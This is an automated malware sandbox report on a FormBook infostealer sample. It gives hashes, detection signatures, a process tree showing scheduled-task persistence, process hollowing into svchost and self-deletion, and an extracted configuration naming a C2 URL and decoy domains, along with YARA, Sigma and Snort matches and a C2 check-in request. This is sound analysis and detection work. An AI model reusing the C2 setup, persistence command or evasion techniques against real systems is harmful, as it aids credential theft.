Analysis Report Order 275594 04-D4E5A.exe

Overview

General Information

Sample Name: Order 275594 04-D4E5A.exe
Analysis ID: 433223
MD5: 3f4cc7f69f0d3b70a20dfd2243bc16db
SHA1: b0e2841f5c7d754e4af796088b659c204edf5fd8
SHA256: 6e556200dba57fdce36308bbd34c19398ecf627828627b380244aeede2f90176
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspect Svchost Activity
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • Order 275594 04-D4E5A.exe (PID: 2024 cmdline: 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe' MD5: 3F4CC7F69F0D3B70A20DFD2243BC16DB)
    • schtasks.exe (PID: 6040 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EDclkRlYpO' /XML 'C:\Users\user\AppData\Local\Temp\tmp285B.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Order 275594 04-D4E5A.exe (PID: 3596 cmdline: {path} MD5: 3F4CC7F69F0D3B70A20DFD2243BC16DB)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 5392 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 1332 cmdline: /c del 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.couragepennies.com/dlwk/"], "decoy": ["universitypinesseniorliving.com", "mtcy0852.com", "abslevha.com", "breedersbatch.com", "longlivegenx.com", "yibaogy.com", "sex8e.com", "luxsot.com", "arizonafinevioins.com", "lalabusha.xyz", "everycases.net", "unhealthyisunweathly.com", "anchorphonemounts.com", "teachuswell.com", "theshadedco.com", "wallopchain.com", "balitourexplore.com", "resctub.com", "freshlyfadedapparel.com", "betamartgroceries.com", "jordanbaileyportfolio.com", "kellenkamm.com", "starwarsnyc.com", "banhsinhnhat.net", "keminadentalcare.com", "belocalsearch.com", "cihedu-formation.com", "merroir.net", "rjdsouza.com", "evolutionhvac.net", "larepublica0.com", "filmarabia.com", "14dzb.com", "realoneathletics.com", "easx.systems", "centerzasporocila.com", "divishasharma.com", "livinghistory.city", "itsoftwarekrzysztofradwan.com", "chinhhanghm46.site", "may252021.com", "a2zcreditrepair.com", "1comcall.com", "hourgroups.com", "tabletz-llc.com", "nliplace.com", "myproductives.com", "gogo90s.com", "therotaryphone.com", "rosaouladi.com", "myfragnance.com", "nhbeitai.com", "medermatologia.com", "7750118.com", "bandweven.com", "blue-wms.net", "dacyclinu.com", "creativehuesdesigns.com", "misteraircondition.com", "bryantbe.com", "bdgunshi.com", "51zheyang.com", "israelemirates.travel", "wildslaskan.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      17.2.Order 275594 04-D4E5A.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        17.2.Order 275594 04-D4E5A.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        17.2.Order 275594 04-D4E5A.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          System Summary:

          Sigma detected: Suspect Svchost Activity
          Source: Process started, Author: David Burkett, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5392
          Sigma detected: Suspicious Svchost Process
          Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5392
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process started, Author: vburov, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5392

          Signature Overview


          AV Detection:

          Found malware configuration
          Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\EDclkRlYpO.exe, Metadefender: Detection: 20%
          Source: C:\Users\user\AppData\Roaming\EDclkRlYpO.exe, ReversingLabs: Detection: 50%
          Multi AV Scanner detection for submitted file
          Source: Order 275594 04-D4E5A.exe, Metadefender: Detection: 20%
          Source: Order 275594 04-D4E5A.exe, ReversingLabs: Detection: 50%
          Yara detected FormBook
          Source: Yara match, File source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPE
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.Order 275594 04-D4E5A.exe.10000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen2

          Compliance:

          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Unpacked PE file: 0.2.Order 275594 04-D4E5A.exe.10000.0.unpack
          Source: Order 275594 04-D4E5A.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Order 275594 04-D4E5A.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000012.00000000.353720348.0000000006300000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Order 275594 04-D4E5A.exe, 00000011.00000002.363040639.0000000001A6F000.00000040.00000001.sdmp, svchost.exe, 00000017.00000003.362268250.0000000000D00000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Order 275594 04-D4E5A.exe, svchost.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000012.00000000.353720348.0000000006300000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 4x nop then pop ebx, 17_2_00407B02
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 4x nop then pop edi, 17_2_00417D6B
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop ebx, 23_2_00357B02
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi, 23_2_00367D6B

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 184.168.131.241:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 184.168.131.241:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 184.168.131.241:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.couragepennies.com/dlwk/
          Source: global traffic, HTTP traffic detected: GET /dlwk/?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3DR3Chi1RjI9I2gNlG9lXXXNlrydudUfV5dRmlhE HTTP/1.1, Host: www.filmarabia.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: Joe Sandbox View, IP Address: 184.168.131.241
          Source: Joe Sandbox View, ASN Name: AS-26496-GO-DADDY-COM-LLCUS
          Source: unknown, DNS traffic detected: queries for: www.filmarabia.com

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample, Static PE information: Filename: Order 275594 04-D4E5A.exe
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 0_2_00AA01A4 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 0_2_00AA017E NtQueryInformationProcess
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 0_2_00AA3449 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_00419D60 NtCreateFile
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_00419E10 NtReadFile
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_00419E90 NtClose
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_00419F40 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_00419D5A NtCreateFile
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_00419DB2 NtCreateFile
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_00419E0A NtReadFile
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_00419E8B NtClose
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_00419F3C NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B98F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B95D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B97A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B99D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9950 NtQueueApcThread
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B98A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9820 NtEnumerateKey
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019BB040 NtSuspendThread
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019BA3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9B00 NtSetValueKey
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9A10 NtQuerySection
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B95F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019BAD30 NtSetContextThread
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9560 NtWriteFile
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9FE0 NtCreateMutant
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019BA710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019BA770 NtOpenThread
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9770 NtSetInformationFile
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9760 NtOpenProcess
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B96D0 NtCreateKey
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9650 NtQueryValueKey
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: 17_2_019B9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A96D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A95D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031AA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031AB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031AA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031AA770 NtOpenThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031AAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A9560 NtWriteFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_031A95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_00369D60 NtCreateFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_00369E10 NtReadFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_00369E90 NtClose
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_00369F40 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_00369D5A NtCreateFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_00369DB2 NtCreateFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_00369E0A NtReadFile
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_00369E8B NtClose
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 23_2_00369F3C NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exe, Code function: String function: 0197B150 appears 133 times
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: String function: 0316B150 appears 136 times
          Source: Order 275594 04-D4E5A.exe, Binary or memory string: OriginalFilename vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304577458.0000000002878000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameWindowsNetwork.dll> vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000000.198736088.0000000000012000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameEhBr.exe: vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.312462947.00000000070B0000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameMajorRevision.exe< vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.312764855.0000000007230000.00000002.00000001.sdmp, Binary or memory string: originalfilename vs Order 275594 04-D4E5A.exe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.312764855.0000000007230000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Order 275594 04-D4E5A.exe
